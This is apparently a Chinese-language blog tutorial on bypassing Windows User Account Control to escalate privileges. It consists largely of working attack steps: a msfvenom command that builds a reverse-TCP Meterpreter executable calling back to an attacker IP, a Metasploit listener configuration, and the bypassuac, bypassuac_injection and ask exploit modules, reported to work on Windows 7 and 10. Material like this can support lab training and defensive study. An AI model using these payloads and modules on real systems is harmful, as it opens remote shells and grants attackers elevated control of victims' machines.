BypassUAC-权限提升

什么是UAC?如何设置?

UAC(UserAccount Control,用户账户控制)

简言之就是在Vista及更高版本中通过弹框进一步让用户

确认是否授权当前可执行文件来达到阻止恶意程序的目的。

可以通过命令msconfig启动管理器,更改UAC设置等级(默认等级)

参考:http://cn-sec.com/archives/116488.html

#BypassUAC提权?常见绕过项目?

为了远程执行目标的exe或者bat可执行文件绕过此安全机制,以此叫BypassUAC

绕过项目:MSF内置,Powershell渗透框架,UACME项目(推荐)

https://github.com/hfiref0x/UACME

#开启UAC和未开启UAC时,MSF默认getsystem提权影响(进程注入)

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.46.131 LPORT=3333 -f exe -o msf.exe

win+r(运行),输入msconfig,在工具目录可以看到UAC设置,修改需重启生效。

BypassUAC-权限提升_第1张图片

 BypassUAC-权限提升_第2张图片

如果对方服务器UAC开启的话,我们执行程序就会弹出下图界面,实际测试中通常在命令行中完成,如果开启UAC将会影响我们的进一步提权。

 BypassUAC-权限提升_第3张图片

配置监听会话
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 3333
exploit

BypassUAC-权限提升_第4张图片

设置 use exploit/windows/local/bypassuac

BypassUAC-权限提升_第5张图片

 

BypassUAC-权限提升_第6张图片

win7&win10均测试成功。

Test in Win7 本地电脑 本地权限

use exploit/windows/local/bypassuac

Test in Win10 本地电脑 本地权限

use exploit/windows/local/bypassuac_injection

use exploit/windows/local/ask

你可能感兴趣的:(sql,数据库,database,web安全,windows)